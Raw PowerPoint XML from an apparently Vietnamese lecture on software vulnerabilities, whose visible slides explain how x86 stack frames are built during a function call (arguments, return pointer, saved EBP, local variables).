              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="79" name="Google Shape;241;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC90308E-1C58-2DD9-B3AB-25D840311E91}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="8430303" y="3054012"/>
              <a:ext cx="802200"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Stack</a:t>
              </a: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80" name="Google Shape;242;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C608B9B7-C0A1-23F2-CB16-31FA11645E02}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="8477368" y="4491726"/>
              <a:ext cx="708069" cy="400079"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>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Code</a:t>
              </a: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grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="153189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304495" y="2057400"/>
            <a:ext cx="2584500" cy="4672584"/>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push $2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" kern="0">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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Google Shape;263;p28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A07692B-B1A7-2718-8327-48ECF5293160}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3276600" y="1806202"/>
            <a:ext cx="2498400" cy="913207"/>
            <a:chOff x="102700" y="3247293"/>
            <a:chExt cx="2498400" cy="1021214"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="16" name="Google Shape;264;p28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05F42AB0-028E-F73A-6206-CE94C2B76BD1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="17" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="1351900" y="3247293"/>
              <a:ext cx="0" cy="590357"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Google Shape;265;p28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D9572FC-A651-DC09-26A6-97CBB04B3502}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="102700" y="3837650"/>
              <a:ext cx="2498400" cy="430857"/>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600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>M</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>ã nguồn C</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Google Shape;266;p28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B845B685-748E-BFFB-ED60-5EA4EB8F5FBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2875600" y="3590122"/>
            <a:ext cx="3290675" cy="677078"/>
            <a:chOff x="2845500" y="2805925"/>
            <a:chExt cx="3290675" cy="677078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="19" name="Google Shape;267;p28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B27895C-4BAA-0E8E-A284-9C06981C0ECA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="20" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5343900" y="3144464"/>
              <a:ext cx="792275" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Google Shape;268;p28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D43893C-ABA6-ECEB-D4F3-FFA80CB83C4D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2845500" y="2805925"/>
              <a:ext cx="2498400" cy="677078"/>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Mã được dịch sang Assembly</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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C9277423-971C-CBA5-D0CD-87B903BF15FC}"/>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717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r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>Con trỏ EBP và ESP đang trỏ vào stack frame của hàm gọi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>Con trỏ EIP trỏ vào lệnh tiếp theo sẽ được thực thi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>Lệnh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>màu đỏ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t> là lệnh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>đang được thực thi</a:t>
            </a:r>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push $2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" kern="0">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233472401"/>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518717909"/>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43125" y="2209800"/>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19050" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="46" name="Group 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B02AE94D-B27B-D1C8-34BF-9E3FB92D25F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2843124" y="2499126"/>
            <a:ext cx="797387" cy="338514"/>
            <a:chOff x="2209799" y="2499126"/>
            <a:chExt cx="797387" cy="338514"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Google Shape;313;p31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77217EF0-C28F-04F2-FC23-61A5643E008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ESP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4" name="Google Shape;314;p31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9486792A-C515-FCC2-90C9-617E663D82E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="23" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2757612" y="2668382"/>
              <a:ext cx="249574" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Google Shape;315;p31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3974FC72-ACCD-D49A-8FE4-9421F58C5627}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="2590800"/>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2760057"/>
            <a:ext cx="559800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="Straight Connector 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{063E3FEB-A0B1-CC8F-9B04-F31DB95CA3CB}"/>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1185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1. Đẩy các tham số vào stack theo thứ tự ngược khi truyền</a:t>
            </a:r>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push $2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" kern="0">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858974371"/>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FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="FF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914080558"/>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43125" y="2209800"/>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19050" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="46" name="Group 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B02AE94D-B27B-D1C8-34BF-9E3FB92D25F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2843124" y="2819400"/>
            <a:ext cx="797387" cy="338514"/>
            <a:chOff x="2209799" y="2499126"/>
            <a:chExt cx="797387" cy="338514"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Google Shape;313;p31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77217EF0-C28F-04F2-FC23-61A5643E008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24" name="Google Shape;314;p31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9486792A-C515-FCC2-90C9-617E663D82E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="23"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sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Google Shape;315;p31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3974FC72-ACCD-D49A-8FE4-9421F58C5627}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="28618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3031143"/>
            <a:ext cx="559800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="Straight Connector 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB103225-2E1B-2C4A-9125-5F4EA77D25ED}"/>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687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Nội dung</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lỗ hổng tràn bộ đệm (Buffer Overflow)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lỗ hổng tràn số nguyên</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lỗ hổng xâu định dạng</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Cơ bản về lập trình an toàn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>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92283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1. Đẩy các tham số vào stack theo thứ tự ngược khi truyền</a:t>
            </a:r>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push $1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" kern="0">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2072531340"/>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FF0000"/>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2232153743"/>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43125" y="2209800"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Google Shape;315;p31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3974FC72-ACCD-D49A-8FE4-9421F58C5627}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="30904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3259743"/>
            <a:ext cx="559800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB07F084-5165-F0A6-C5D4-B16841B6CE97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2843124" y="316668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36339717-C265-FF11-7A96-952524FBC8E7}"/>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11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2. Lệnh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t> thực hiện:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800"/>
              <a:t>Đẩy giá trị của EIP (chứa địa chỉ lệnh tiếp theo, sau lệnh gọi hàm callee, của caller) vào stack. Giá trị EIP được lưu này được gọi là RIP (return instruction pointer)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800"/>
              <a:t>Thay đổi EIP trỏ vào lệnh của hàm callee</a:t>
            </a:r>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924294158"/>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FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>RIP của callee</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="FF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659372195"/>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43125" y="2209800"/>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nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB07F084-5165-F0A6-C5D4-B16841B6CE97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2843124" y="354768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D5C185FD-1248-7055-3874-B9A4EE36756F}"/>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8" name="Google Shape;316;p31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE0C87A1-2206-E65E-5593-97653B539739}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5890800" y="3505200"/>
            <a:ext cx="1195800" cy="211742"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="924433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Thực hiện các lệnh mở đầu hàm để thiết lập stack frame cho hàm callee</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4214667323"/>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FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>RIP của callee</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="FF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95394234"/>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43125" y="2209800"/>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nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB07F084-5165-F0A6-C5D4-B16841B6CE97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2843124" y="354768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sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle: Rounded Corners 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60C58D9D-FF48-D178-E0DE-3C0FB5C3104B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7010400" y="4343400"/>
            <a:ext cx="1905000" cy="7620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DF660D9D-78CF-FCF5-3C9F-052C22C69AC6}"/>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959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3. Cất giá trị hiện tại của EBP vào stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>Giá trị được cất giữ này được gọi là SFP (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>saved frame pointer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>SFP được sử dụng để khôi phục lại giá trị cho con trỏ EBP khi hàm callee trả về</a:t>
            </a:r>
          </a:p>
          <a:p>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386375552"/>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latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>SFP của callee</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3887931743"/>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43125" y="2209800"/>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943600" y="45382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43124" y="392868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7C5DACC1-9556-5ACC-8285-CBAC32C91964}"/>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2921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4. Dịch chuyển EBP tới vị trí của ESP</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562002758"/>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FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>SFP của callee</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="FF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057400" y="3928686"/>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943600" y="47668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43124" y="392868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C433C504-6720-4A04-A6FC-AF5731E97058}"/>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55022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4. Dịch chuyển ESP để tạo không gian nhớ lưu trữ giá trị của các biến cục bộ</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4041011303"/>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000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>SFP của callee</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="00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latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>loc1</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latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>loc2</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34476" y="3924311"/>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943600" y="50716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59206" y="467695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B9C77105-124F-165D-DC43-B50E11ADFE8D}"/>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0753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5. Thực thi hàm callee</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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    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000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
